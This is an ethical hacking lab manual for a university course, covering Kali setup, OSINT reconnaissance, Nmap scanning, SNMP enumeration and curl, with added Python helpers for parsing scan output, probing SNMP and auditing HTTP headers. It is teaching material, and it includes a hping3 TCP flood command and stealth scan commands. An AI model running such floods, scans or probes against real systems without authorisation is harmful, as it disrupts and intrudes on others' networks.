Ethical Hacking Lab Manual

Uploaded by Kutubo Jaiteh

LABORATORY MANUAL
Experiments in Ethical Hacking

University of Engineering and Technology


LIST OF AUTHORS
Sr. #  Name         Date Modified  Contributions
1      Hamza Ayub   2024           1st version of the manual
2      Wahaj Babar  2024           1st version of the manual


INTRODUCTION
This Lab manual consists of laboratory experiments to complement the theory course "Ethical
Hacking", offered by the KICS Department of University of Engineering and Technology. During
the first part, techniques in penetration testing using various tools and methodologies are
discussed. This includes network scanning, vulnerability assessment, and exploitation. The second
part focuses on advanced topics such as web application security, wireless network security, and
social engineering attacks.

The basic purpose of this manual is to

● Perform experiments that demonstrate the workings of security systems and vulnerabilities
as explained in the theory course.
● Introduce students to electronic tools and software used in ethical hacking practices, which
may not be fully covered in the lecture course due to time constraints.
● Familiarize students with proper laboratory procedures, including precise record-keeping,
logical troubleshooting, ethical considerations, and adherence to legal and professional
standards.

The sequence and scope of the experiments in this booklet are parallel to the material covered in
the textbook. All experiments have been tested by students and revised to improve clarity and
effectiveness. The authors welcome any comments or suggestions to enhance the style, scope, or
clarity of the experiments, as well as to ensure the ethical integrity of the content.

Hamza Ayub
Wahaj Babar
Certified Ethical Hacking

CONTENTS
Sr. No  Experiment Name

Fundamentals
1 Setup of Hacking Lab

Network Security and Assessment

2 Network Scanning and Enumeration Techniques

3 Vulnerability Assessment and Management

4 System Hacking

5 Malware Threats

6 Password Cracking and Hash Analysis

Advanced Hacking Techniques

7 Social Engineering Attacks and Countermeasures

8 Exploiting Buffer Overflows

9 Denial of Service (DoS) Attack Simulation

10 Man-in-the-Middle (MITM) Attack Exploration

11 Exploiting SQL Injection Vulnerabilities

12 Wireless Network Packet Sniffing and Analysis

13 Intrusion Detection System (IDS) Evasion Techniques


EXPERIMENT 1
Setup of Hacking Lab
COMPONENTS/Tools:
● At least 20 GB of disk space
● At least 1 GB of RAM (preferably 2) for i386 and amd64 architectures
● VirtualBox (or alternative virtualization software)

THEORY REFRESHER:
Before setting up the hacking lab, it's essential to understand the basics of
virtualization and its importance in ethical hacking environments. Virtualization allows us to
create virtual machines (VMs) within a single physical machine, enabling us to run multiple
operating systems simultaneously. In the context of ethical hacking, virtualization enables the
creation of isolated environments for testing various tools and techniques without affecting
the host system or network.

PROCEDURE:

● Download Kali Linux ISO Image


○ On the official Kali Linux website downloads section, you can find Kali Linux .iso
images. These images are uploaded every few months, providing the latest official
releases.
○ Navigate to the Kali Linux Downloads page and find the packages available for
download. Depending on the system you have, download the 64-Bit or 32-Bit version.
● Create Kali Linux VirtualBox Container
○ After downloading the .iso image, create a new virtual machine and import Kali as its
OS.
○ Launch VirtualBox Manager and click the New icon.
○ Name and operating system. A pop-up window for creating a new VM appears.
Specify a name and a destination folder. The Type and Version change automatically,
based on the name you provide. Make sure the information matches the package you
downloaded and click Next.

○ Memory size. Choose how much memory to allocate to the virtual machine and click
Next. The default setting for Linux is 1024 MB. However, this varies depending on
your individual needs.
○ Hard disk. The default option is to create a virtual hard disk for the new VM. Click
Create to continue. Alternatively, you can use an existing virtual hard disk file or
decide not to add one at all.
○ Hard disk file type. Stick to the default file type for the new virtual hard disk, VDI
(VirtualBox Disk Image). Click Next to continue.
○ Storage on a physical hard disk. Decide between Dynamically allocated and Fixed
size. The first choice allows the new hard disk to grow and fill up space dedicated to
it. The second, fixed size, uses the maximum capacity from the start. Click Next.
○ File location and size. Specify the name and where you want to store the virtual hard
disk. Choose the amount of file data the VM is allowed to store on the hard disk. We
advise giving it at least 8 gigabytes. Click Create to finish.
○ Now you created a new VM. The VM appears on the list in the VirtualBox Manager.
● Configure Virtual Machine Settings
○ The next step is adjusting the default virtual machine settings.
○ Select a virtual machine and click the Settings icon. Make sure you marked the
correct VM and that the right-hand side is displaying details for Kali Linux.

○ In the Kali Linux – Settings window, navigate to General > Advanced tab. Change the
Shared Clipboard and Drag’n’Drop settings to Bidirectional. This feature allows you to
copy and paste between the host and guest machine.
○ Go to System > Motherboard. Set the boot order to start from Optical, followed by
Hard Disk. Uncheck Floppy as it is unnecessary.

○ Next, move to the Processor tab in the same window. Increase the number of
processors to two (2) to enhance performance.

○ Finally, navigate to Storage settings. Add the downloaded Kali image to a storage
device under Controller: IDE. Click the disk icon to search for the image. Once
finished, close the Settings window.
○ Click the Start icon to begin installing Kali.

● Installing and Setting Up Kali Linux


○ After you boot the installer by clicking Start, a new VM VirtualBox window
appears with the Kali welcome screen.
○ Select the Graphical install option and go through the following installation steps for
setting up Kali Linux in VirtualBox.
○ Select a language. Choose the default language for the system (which will also be the
language used during the installation process).
○ Select your location. Find and select your country from the list (or choose “other”).
○ Configure the keyboard. Decide which keymap to use. In most cases, the best option
is to select American English.
○ Configure the network. First, enter a hostname for the system and click Continue.
○ Next, create a domain name (the part of your internet address after your hostname).
Domain names usually end in .com, .net, .edu, etc. Make sure you use the same
domain name on all your machines.
○ Set up users and passwords. Create a strong root password for the system
administrator account.
○ Configure the clock. Select your time zone from the available options.
○ Partition disks. Select how you would like to partition the hard disk. Unless you have a
good reason to do it manually, go for the Guided –use entire disk option.
○ Then, select which disk you want to use for partitioning. As you created a single
virtual hard disk in the Configure Virtual Machine Settings step, you do not have to worry
about data loss. Select the only available option – SCSI3 (0,0,0) (sda) – 68.7 GB ATA VBOX
HARDDISK (the details after the dash vary depending on your virtualization software).
○ Next, select the scheme for partitioning. If you are a new user, go for All files in one
partition.
○ The wizard gives you an overview of the configured partitions. Continue by navigating
to Finish partitioning and write changes to disk. Click Continue and confirm with Yes.
○ The wizard starts installing Kali. While the installation bar loads, additional
configuration settings appear.
○ Configure the package manager. Select whether you want to use a network mirror
and click Continue. Enter the HTTP proxy information if you are using one. Otherwise,
leave the field blank and click Continue again.
○ Install the GRUB boot loader on a hard disk. Select Yes and Continue. Then, select a
boot loader device to ensure the newly installed system is bootable.
○ Once you receive the message Installation is complete, click Continue to reboot your
system. With this, you have successfully installed Kali Linux on VirtualBox. After rebooting,
the Kali login appears. Type in the username (root) and the password you entered in the
previous steps.
○ Finally, the interface of Kali Linux appears on your screen.
EXPERIMENT 2
Network Scanning and Enumeration Techniques
Part (a): Footprinting and Reconnaissance
THEORY REFRESHER:
Footprinting (also known as reconnaissance) is the technique used for gathering
information about computer systems and the entities they belong to. To get this information, a
hacker might use various tools and technologies. This information is very useful to a hacker
who is trying to crack a whole system. It helps to:
● Know Security Posture: The data gathered gives an overview of the security
posture of the company, such as details about the presence of a firewall,
security configurations of applications, etc.
● Reduce Attack Area: It can identify a specific range of systems and
concentrate on particular targets only. This greatly reduces the number of
systems we are focusing on.
● Identify Vulnerabilities: We can build an information database containing the
vulnerabilities, threats, and loopholes present in the systems of the target
organization.
● Draw Network Map: It helps to draw a network map of the networks in the
target organization covering topology, trusted routers, presence of servers, and
other information.

Part (a1): Footprinting using Maltego

Maltego is an open source intelligence and forensics application. It gathers
information about a target and represents it in an easily understandable format.

COMPONENTS/Tools:
● Kali Linux virtual machine
Objectives:

● Identify IP address
● Identify Domain and Domain Name Schema
● Identify Server Side Technology
● Identify Start of Authority (SOA) information
● Identify Name Server
● Identify Mail Exchanger
● Identify Geographical Location
● Identify Entities
● Discover Email addresses and Phone numbers

PROCEDURE:

● Click on the (+) icon located at the top-left corner of the GUI (in the toolbar) to create
a new graph window (like a blank document).
● Go to the left panel and expand the Infrastructure node under Entity Palette. This list
has a bunch of useful entities such as AS, DNS Name, Domain, MX Record, etc.
● Drag the Website entity to your New Graph(1) section.
● Rename the domain name to [Link]
● Identifying the server side technology
● Right-click the entity and select All Transforms and click To Server Technologies
[BuiltWith]
● Identifying the Domain
○ Create a new graph or delete/save the previous results.
○ Right-click the Domain entity and select All Transforms -> To Domains [DNS].

● This transform will attempt to test name schemas against a domain and try to identify a
specific name schema for the domain.
● Identifying the SOA information

○ Create a new graph or delete/save the previous results.


○ Right-click the Domain entity and select All Transforms -> To DNS Name - SOA (Start of
Authority).
● Identifying the Mail Exchanger
○ Create a new graph or delete/save the previous results.
○ Right-click the Domain entity and select All Transforms -> To DNS Name - MX (mail server).

● Identifying the Name Server


○ Create a new graph or delete/save the previous results.
○ Right-click the Domain entity and select All Transforms -> To DNS Name - NS (name server).

● Identifying the IP Address, Location and Whois

○ Create a new graph or delete/save the previous results.


○ Right-click the Website entity and select All Transforms -> To IP address [DNS].
○ Right-click the IP entity and select All Transforms -> To Location [city, country].
○ Right-click the Website entity and select All Transforms -> To entities from whois [IBM
Watson].
Part (a2): Recon-ng Tutorial
Recon-ng is an open-source web reconnaissance framework used to extract information about
a target organization and its personnel from public sources.

COMPONENTS/Tools:

● Kali Linux virtual machine

Objectives:

● How to perform network recon.


● Gather hosts related to a domain.
● Personal Information Gathering.
● Generate a report with harvested information.
● Recon-ng has a look and feel similar to the Metasploit Framework, reducing the learning
curve for leveraging the framework.

PROCEDURE:

● Open the terminal and type recon-ng


● Type help to view all commands that allow you to add/delete records to DB, query, etc.

back Exits the current context


dashboard Displays a summary of activity
db Interfaces with the workspace's database
exit Exits the framework
help Displays this menu
index Creates a module index (dev only)
keys Manages third party resource credentials
marketplace Interfaces with the module marketplace
modules Interfaces with installed modules
options Manages the current context options
pdb Starts a Python Debugger session (dev only)
script Records and executes command scripts
shell Executes shell commands
show Shows various framework items
snapshots Manages workspace snapshots
spool Spools output to a file
workspaces Manages workspaces
Part (a3): Using Modules from Recon-ng Marketplace

With its independent modules, database interaction, built-in convenience functions, interactive
help, and command completion, Recon-ng provides a powerful environment in which open source
web-based reconnaissance can be conducted quickly and thoroughly. To add new modules you
use the marketplace.

PROCEDURE:

● To view the entire marketplace repo type: marketplace search


● Working with modules and workspaces is straightforward, as the example below shows:
● Install a module using the marketplace command: > marketplace install
recon/domains-hosts/findsubdomains
● Load the module using the modules load command: > modules load
recon/domains-hosts/findsubdomains
● Show the module options: > info
● Execute the module: > run
● To leave the current module or workspace context type: > back
● Select an existing workspace: > workspaces select W0rkspaceName
● Select an installed module: > modules load path/to/module-name
Part (a4): Information Gathering using theHarvester

THEORY REFRESHER:
theHarvester is used to gather open source intelligence (OSINT) on a company or domain. It
gathers emails, subdomains, hosts, employee names, open ports and banners from different
public sources like search engines, PGP key servers and the SHODAN computer database. It has
been developed in Python by Christian Martorella. It is a very helpful tool in the early stages of
a penetration test and helps to understand the customer's footprint on the internet. Some
professionals also use theHarvester to review the information available to an attacker through
the internet.
Requirements:

● Kali Linux virtual machine.

Objectives:

● Demonstrate how to identify vulnerabilities and information disclosures in search engines
using theHarvester.
● Extract email, subdomain names, virtual hosts(...) from the web sites.

Procedure:

● Run theHarvester against a target


● To view all the commands option, type: theHarvester -h
● Let's perform a full harvest on this target: theHarvester -d [Link] -l 300 -b all
● On the help command you can see the meaning of these options, like -d stands for domain,
and -l for limiting the number of search results, and -b is the search engine/source.
● theHarvester may return more information than you can read through; for better readability,
you can write the output to an HTML file:

theHarvester -d [Link] -l 300 -b all -f report

● The file will be exported in your home folder in Kali Machine.


● Note: If you have trouble exporting the HTML file, keep in mind that a huge amount of
information is being collected; you can reduce the number of search engines/sources instead
of using them all at once.
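The email and host extraction that theHarvester automates can be reproduced on any scraped text with a few lines of Python. The block below is added to this manual as an example; it is not part of theHarvester or of the original lab text, and the sample text, addresses and host names in it are constructed. It also shows the scope check that matters when you review such results: a host is only an asset of the target domain if it matches on a label boundary, so look-alike names such as cdn.example.com.evil.net are dropped.

```python
import re
from typing import Dict, List, Set

# Constructed sample of scraped text (search-engine snippets, a PGP key-server
# listing, a careers page). Every address and host name below is invented.
SAMPLE_TEXT = """
Contact: jane.doe@example.com or j.smith@Example.com for support.
Careers page at https://jobs.example.com/apply and mail hr@example.com.
Old server: legacy-vpn.example.com (do not use). Partner site: shop.partner-example.net
Ignore noreply@mailer.otherdomain.org and https://cdn.example.com.evil.net/x
Duplicate: jane.doe@example.com
"""

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
HOST_RE = re.compile(r"\b((?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,})\b")


def in_scope(hostname: str, domain: str) -> bool:
    """True only for the target domain itself or a real subdomain of it.

    The comparison is on a label boundary: 'cdn.example.com.evil.net' and
    'notexample.com' must NOT count as example.com assets.
    """
    h = hostname.lower().rstrip(".")
    d = domain.lower().rstrip(".")
    return h == d or h.endswith("." + d)


def harvest(text: str, domain: str) -> Dict[str, List[str]]:
    """Extract e-mail addresses and host names that belong to `domain`.

    Results are lower-cased and de-duplicated, which is what a reviewer
    needs before comparing the list against the asset inventory.
    """
    emails: Set[str] = set()
    hosts: Set[str] = set()
    for addr in EMAIL_RE.findall(text):
        local, _, host = addr.rpartition("@")
        if in_scope(host, domain):
            emails.add(f"{local}@{host.lower()}")
    for host in HOST_RE.findall(text):
        if in_scope(host, domain):
            hosts.add(host.lower())
    return {"emails": sorted(emails), "hosts": sorted(hosts)}


if __name__ == "__main__":
    for kind, items in harvest(SAMPLE_TEXT, "example.com").items():
        print(f"{kind}:")
        for item in items:
            print(f"  {item}")
```

Run it on the text of a saved search-result page or a theHarvester dump to get the de-duplicated, in-scope list; the out-of-scope addresses in the sample show why a plain substring match on the domain name is not good enough.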

Part (b): Scanning and Enumeration


Part (b1): Scanning Network

THEORY REFRESHER:
Network Scanning refers to a set of procedures performed to identify hosts, ports, and
services running in a network. The purpose of network scanning is as follows:

● Recognize available UDP and TCP network services running on the targeted hosts.
● Recognize filtering systems between the user and the targeted hosts.
● Determine the operating systems (OSs) in use by assessing IP responses.
● Evaluate the target host's TCP sequence number predictability to assess its exposure
to sequence prediction attacks and TCP spoofing.

Part (b1.1): hping3

Objectives:

● How to perform network scanning and packet crafting using hping3 commands.

Requirements:

● Kali Linux (Attacker machine)


● Windows 10 (Target machine)

PROCEDURE:

● Login to Kali Linux and launch the Terminal.


● Use hping3 -h to show all the options. We will focus on only a couple of them, so don't
worry.
● Let's start!

hping3 -c 3 <Target IP address>

● Perform TCP Flooding

hping3 <Target IP address> --flood

Part (b1.2): Network Scanning using Nmap


Objectives:
● Scan a whole Subnet.
● Trace all the sent and received packets.
● Perform a slow comprehensive scan.
● Create a new profile to perform a Null Scan.
● Scan TCP and UDP ports.
● Analyze hosts details and their topology.
● Scanning Techniques:
○ TCP Connect Scan
○ Xmas Scan
○ ACK Flag Scan
○ UDP Scan
○ IDLE Scan
● Avoiding Scanning Detection
Requirements:
● Windows 10 machine.
● Kali Linux machine.

PROCEDURE:
● Scan a whole Subnet
○ Open the Terminal window and type

nmap -O <IP Range>

The option -O is related to Operating System Detection.

● Trace all the Sent and Received Packets


○ Select one host that you scanned

nmap --packet-trace [Link]

○ With the --packet-trace option, Nmap prints a summary of every packet it sends to the
target and every packet it receives in response.
● Identifying Services with TCP Null Scan

nmap -sN -T4 -A <Target IP address>

-sN: TCP Null Scan (no TCP flags set).
-T4: Timing template 4 ("aggressive"), which speeds scans up by assuming you are on a
reasonably fast and reliable network.
-A: Enables OS detection, version detection, script scanning, and traceroute.

Part (b2): Enumeration


THEORY REFRESHER:
Enumeration is the process of extracting user names, machine names,
network resources, shares, and services from a system, and it is conducted in an
intranet environment. In this phase, the attacker creates an active connection to the
system and performs directed queries to gain more information about the target. The
gathered information is used to identify vulnerabilities or weak points in the system's
security, which the attacker then tries to exploit in the system hacking phase.

Part (b2.1): Enumerating Services

Objectives:
● Scan all the machines on a given network or subnet.
● List all alive hosts.
● Determine open ports on a given node.
● Find if any port has firewall restrictions.
● Enumerate all the services running on the port along with their respective versions.

Requisites:
● Windows Server 2012 or 2016 machine.
● Kali Linux machine.
● Another version of Windows (7, 8, 10 or Server).

Procedure:
● Ping Sweep - Nmap

○ You can perform a ping sweep in Nmap by using a ping-only scan (-sP, an older alias
of -sn) on the whole subnet.
○ The ping sweep scans all the nodes on the subnet and displays all the hosts that are
up and running, along with their respective MAC addresses and device information.
○ Open a new Terminal window on your Kali Linux and type:

nmap -sP [Link]/24

● Perform Stealth Syn Scan

○ Now, choose an IP address from the results, and perform a stealth syn scan
on Nmap.

nmap -sS <Target IP Address>

● Stealth Syn Scan with Version and OS Detection

○ Version Detection collects information about the specific service running on an
open port, including the product name and version number. This information
can be critical in determining an entry point for an attack.
○ Nmap will perform a stealth scan with version detection along with OS
detection.

nmap -sSV -O <Target IP Address> -oN [Link]
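The Nmap output produced by the scans in Part (b1.2) and in this part is normally read by eye. The following Python is an added example, not taken from Nmap or from the original manual; it parses Nmap's normal output format (what the terminal and -oN show) into host and port records and answers the objectives above programmatically: open ports with their versions, hosts sitting behind a filtering device, and hosts exposing a given service. The scan text embedded in the block is constructed and uses the 192.0.2.0/24 documentation range.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample of Nmap "normal" output. Addresses are from the
# 192.0.2.0/24 documentation range; no host was actually scanned.
SAMPLE_SCAN = """\
# Nmap 7.94 scan initiated Mon Jan  1 10:00:00 2024 as: nmap -sS -sU -sV -O -oN scan.txt 192.0.2.0/24
Nmap scan report for 192.0.2.10
Host is up (0.0012s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.52 ((Ubuntu))
161/udp  open  snmp    SNMPv1 server (public)
MAC Address: 08:00:27:AA:BB:CC (Oracle VirtualBox virtual NIC)
Running: Linux 5.X
OS details: Linux 5.0 - 5.14

Nmap scan report for win10-lab (192.0.2.20)
Host is up (0.00090s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE  SERVICE       VERSION
135/tcp  open   msrpc         Microsoft Windows RPC
445/tcp  open   microsoft-ds?
3389/tcp closed ms-wbt-server
MAC Address: 08:00:27:DD:EE:FF (Oracle VirtualBox virtual NIC)
Running: Microsoft Windows 10

# Nmap done at Mon Jan  1 10:00:42 2024 -- 2 IP addresses (2 hosts up) scanned in 42.10 seconds
"""


@dataclass
class Port:
    number: int
    proto: str          # tcp / udp
    state: str          # open, closed, filtered, open|filtered, ...
    service: str
    version: str = ""   # only filled in when -sV (or -A) was used


@dataclass
class Host:
    address: str
    ports: List[Port] = field(default_factory=list)
    mac: str = ""
    os_guess: str = ""   # most specific OS line seen (Running: / OS details:)
    not_shown: str = ""  # "998 filtered tcp ports": a filtering device answers for the host


HOST_RE = re.compile(r"^Nmap scan report for (.+?)(?: \((\S+)\))?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_nmap(text: str) -> List[Host]:
    """Turn normal-format Nmap output into Host records."""
    hosts: List[Host] = []
    current: Optional[Host] = None
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:
            current = Host(address=m.group(2) or m.group(1))   # prefer the IP in parentheses
            hosts.append(current)
            continue
        if current is None:
            continue
        m = PORT_RE.match(line)
        if m:
            current.ports.append(Port(int(m.group(1)), m.group(2), m.group(3),
                                      m.group(4), (m.group(5) or "").strip()))
        elif line.startswith("MAC Address:"):
            current.mac = line.split()[2]
        elif line.startswith(("Running:", "OS details:")):
            current.os_guess = line.split(":", 1)[1].strip()
        elif line.startswith("Not shown:"):
            current.not_shown = line.split(":", 1)[1].strip()
    return hosts


def open_ports(host: Host) -> List[Port]:
    # "open|filtered" (typical for UDP) is excluded on purpose: it means "no answer",
    # not a confirmed service.
    return [p for p in host.ports if p.state == "open"]


def hosts_running(hosts: List[Host], service: str, proto: str = "tcp") -> List[str]:
    return [h.address for h in hosts
            if any(p.service == service and p.proto == proto for p in open_ports(h))]


def firewalled(hosts: List[Host]) -> List[str]:
    """Hosts whose unlisted ports were 'filtered' rather than 'closed' (firewall in the path)."""
    return [h.address for h in hosts if "filtered" in h.not_shown]


if __name__ == "__main__":
    for h in parse_nmap(SAMPLE_SCAN):
        print(f"{h.address} ({h.os_guess or 'OS unknown'}) mac={h.mac}")
        for p in open_ports(h):
            print(f"  {p.number}/{p.proto} {p.service} {p.version}")
```

Feed it the file written with -oN (open("scan.txt").read()) instead of SAMPLE_SCAN; the "Not shown" line is where the objective "find if any port has firewall restrictions" is answered.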

Part (b2.2): SNMP Enumeration using snmp_enum

Objectives:

● Connected devices
● Hostname and information
● Domain
● Hardware and storage information
● Software components
● Total memory

Requirements:

● Kali Linux machine (Attacker)


● Windows Server 2012 / 2016 (Victim/Target)
● Ubuntu BeeBox (Victim/Target)

Procedure:
● Test for SNMP Port Status

○ First we need to find out whether the SNMP port is open. SNMP uses port 161
(UDP) by default. To check this, we first run an Nmap UDP port scan:

nmap -sU -p 161 <Target IP Address>

-sU: UDP scan.
-p: Port scan range.

● Enumerate Community String

● The other way to do this is to use snmp-check.

snmp-check is installed by default on Kali Linux; just open the terminal and type:

snmp-check <Target IP Address>

● Both methods enumerate the target machine's information and retrieve the same
comprehensive list displaying the System Information. These tools support the
following enumerations:
○ Host IP
○ Hostname
○ Hardware description
○ System uptime
○ SNMP uptime
○ Domain if system is connected in Domain
○ User Accounts
○ MAC Addresses
○ Running Processes
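snmp-check and the snmp_enum module work by sending SNMP GetRequest PDUs carrying the community string and reading the values that come back. The following Python is an added example that is not part of either tool or of the original manual: it builds a minimal SNMPv1 GetRequest for sysDescr.0 by hand (BER encoding), decodes a GetResponse, and can probe one lab host on UDP 161 with a timeout. The response it decodes offline is constructed in code; the host argument and the default community "public" are assumptions about your own lab machine.

```python
import socket
from typing import List, Tuple

SYS_DESCR = "1.3.6.1.2.1.1.1.0"   # sysDescr.0: the first row snmp-check prints


def ber_len(n: int) -> bytes:
    """BER length: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, value: bytes) -> bytes:
    return bytes([tag]) + ber_len(len(value)) + value


def encode_int(n: int) -> bytes:
    """INTEGER (tag 0x02) for non-negative values, minimal two's-complement form."""
    body = n.to_bytes(4, "big").lstrip(b"\x00") or b"\x00"
    if body[0] & 0x80:
        body = b"\x00" + body
    return tlv(0x02, body)


def encode_oid(oid: str) -> bytes:
    """OBJECT IDENTIFIER (tag 0x06): first two arcs packed, base-128 for the rest."""
    parts = [int(p) for p in oid.split(".")]
    out = bytearray([40 * parts[0] + parts[1]])
    for arc in parts[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.insert(0, (arc & 0x7F) | 0x80)
            arc >>= 7
        out.extend(chunk)
    return tlv(0x06, bytes(out))


def build_get(community: str, oid: str, request_id: int = 1) -> bytes:
    """SNMPv1 Message: version 0, community, GetRequest PDU (tag 0xA0), one varbind."""
    varbind = tlv(0x30, encode_oid(oid) + tlv(0x05, b""))          # OID + NULL
    pdu = tlv(0xA0, encode_int(request_id) + encode_int(0) + encode_int(0) + tlv(0x30, varbind))
    return tlv(0x30, encode_int(0) + tlv(0x04, community.encode()) + pdu)


def parse_tlv(buf: bytes, pos: int = 0) -> Tuple[int, bytes, int]:
    """Return (tag, value, position after this element)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def parse_sequence(value: bytes) -> List[Tuple[int, bytes]]:
    items, pos = [], 0
    while pos < len(value):
        tag, val, pos = parse_tlv(value, pos)
        items.append((tag, val))
    return items


def decode_oid(value: bytes) -> str:
    arcs, cur = [value[0] // 40, value[0] % 40], 0
    for b in value[1:]:
        cur = (cur << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(cur)
            cur = 0
    return ".".join(map(str, arcs))


def decode_response(msg: bytes) -> dict:
    """Decode a GetResponse (PDU tag 0xA2) into community, error status and OID -> value."""
    _tag, body, _ = parse_tlv(msg)
    _version, community, pdu = parse_sequence(body)
    if pdu[0] != 0xA2:
        raise ValueError("not a GetResponse PDU")
    _req, err_status, _err_index, varbinds = parse_sequence(pdu[1])
    out = {"community": community[1].decode(),
           "error_status": int.from_bytes(err_status[1], "big"), "varbinds": {}}
    for _t, vb in parse_sequence(varbinds[1]):
        (_, oid_bytes), (vtag, val) = parse_sequence(vb)
        out["varbinds"][decode_oid(oid_bytes)] = val.decode(errors="replace") if vtag == 0x04 else val
    return out


def build_sample_response(community: str, oid: str, descr: str, request_id: int = 1) -> bytes:
    """Constructed GetResponse, used here instead of a live agent."""
    varbind = tlv(0x30, encode_oid(oid) + tlv(0x04, descr.encode()))
    pdu = tlv(0xA2, encode_int(request_id) + encode_int(0) + encode_int(0) + tlv(0x30, varbind))
    return tlv(0x30, encode_int(0) + tlv(0x04, community.encode()) + pdu)


def snmp_get(host: str, community: str = "public", oid: str = SYS_DESCR, timeout: float = 2.0):
    """Probe one lab host (assumed). A v1 agent that rejects the community simply stays
    silent, so None means closed/filtered port OR wrong community."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_get(community, oid), (host, 161))
        try:
            data, _ = s.recvfrom(4096)
        except socket.timeout:
            return None
    return decode_response(data)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:       # python3 snmp_probe.py <lab host IP>
        print(snmp_get(sys.argv[1]) or "no answer (closed/filtered port or community rejected)")
    else:
        print(decode_response(build_sample_response("public", SYS_DESCR, "Linux kali 6.1")))
```

The encoded request is 40 bytes; compare its hex dump with what Wireshark shows for snmp-check's first packet to the same host and the structure lines up field for field. Because a v1 agent never answers a wrong community, the Nmap -sU check in the procedure above is what distinguishes "port open but community refused" from "port closed".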
EXPERIMENT 3
Vulnerability Assessment and Management
COMPONENTS/Tools:
● Kali Linux machine (Attacker)
● Windows 7 (Victim/Target)

THEORY REFRESHER:
Vulnerability Scanning refers to auditing hosts, ports, and services running in a
network to assess the security posture and search for security vulnerabilities. It determines the
possibility of network security attacks, evaluating the organization's systems and network for
vulnerabilities such as missing patches, unnecessary services, weak authentication, and
weak encryption. Vulnerability scanning is a critical component of any penetration testing
assignment.

Part (a): Curl


THEORY REFRESHER:
curl is a small command-line utility for transferring data over various
protocols; libcurl is the free client-side URL transfer library behind it. It supports cookies, HTTP,
HTTP/2, FTP, Gopher, etc., and also performs SSL certificate verification.

Procedure:
● To connect and fetch the data, just write this command in the Kali terminal.

● Here it is showing the result of the command, i.e. [Link]

● Use -X if you want to send a request with a particular HTTP method.

● Here it is showing the result of the command, i.e. curl -v -X HEAD [Link]
Note that curl's documented way to issue a HEAD request is -I (or --head); with -X HEAD curl
still waits for a response body that never arrives, so the command can appear to hang until it
times out.
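What a reviewer looks for in the headers that curl -v or curl -I prints is mostly absence: missing hardening headers, version banners, and cookie flags. The Python below is an added example, not part of curl or of the original manual; it parses a raw HTTP response and returns a list of findings. One weak and one hardened response are constructed inline, and the audit_url helper does the equivalent of curl -I with urllib (the URL you pass it is an assumption about your own lab target).

```python
from typing import Dict, List, Tuple

# Constructed raw responses, in the form `curl -i` (or the `<` lines of `curl -v`) prints them.
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    "Server: Apache/2.4.52 (Ubuntu)\r\n"
    "X-Powered-By: PHP/7.4.3\r\n"
    "Set-Cookie: PHPSESSID=abc123; path=/\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html><body>hello</body></html>"
)

HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "Content-Security-Policy: default-src 'self'; frame-ancestors 'none'\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "Set-Cookie: session=xyz; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)

# Header -> finding text when it is absent. Names are compared case-insensitively.
REQUIRED_HEADERS = {
    "strict-transport-security": "Strict-Transport-Security missing: browsers will still accept plain HTTP",
    "content-security-policy": "Content-Security-Policy missing: no browser-side injection mitigation",
    "x-content-type-options": "X-Content-Type-Options missing: MIME sniffing allowed",
    "x-frame-options": "X-Frame-Options missing (and no CSP frame-ancestors): clickjacking possible",
}
COOKIE_FLAGS = {"secure": "Secure", "httponly": "HttpOnly"}


def parse_response(raw: str) -> Tuple[str, Dict[str, List[str]]]:
    """Split a raw HTTP response into (status line, {lower-case name: [values]})."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers: Dict[str, List[str]] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def audit(raw: str) -> List[str]:
    """Return a list of findings; an empty list means nothing was flagged."""
    _status, headers = parse_response(raw)
    findings: List[str] = []
    # 1. banner disclosure: a version number in Server/X-Powered-By feeds CVE lookups
    for hdr in ("server", "x-powered-by"):
        for value in headers.get(hdr, []):
            if any(ch.isdigit() for ch in value):
                findings.append(f"{hdr} discloses version: {value}")
    # 2. missing hardening headers (CSP frame-ancestors supersedes X-Frame-Options)
    csp = " ".join(headers.get("content-security-policy", []))
    for hdr, msg in REQUIRED_HEADERS.items():
        if hdr in headers or (hdr == "x-frame-options" and "frame-ancestors" in csp):
            continue
        findings.append(msg)
    # 3. session cookie attributes
    for cookie in headers.get("set-cookie", []):
        parts = [p.strip() for p in cookie.split(";")]
        name = parts[0].split("=", 1)[0]
        present = {p.split("=", 1)[0].lower() for p in parts[1:]}
        for flag, label in COOKIE_FLAGS.items():
            if flag not in present:
                findings.append(f"cookie {name} lacks {label}")
    return findings


def audit_url(url: str) -> List[str]:
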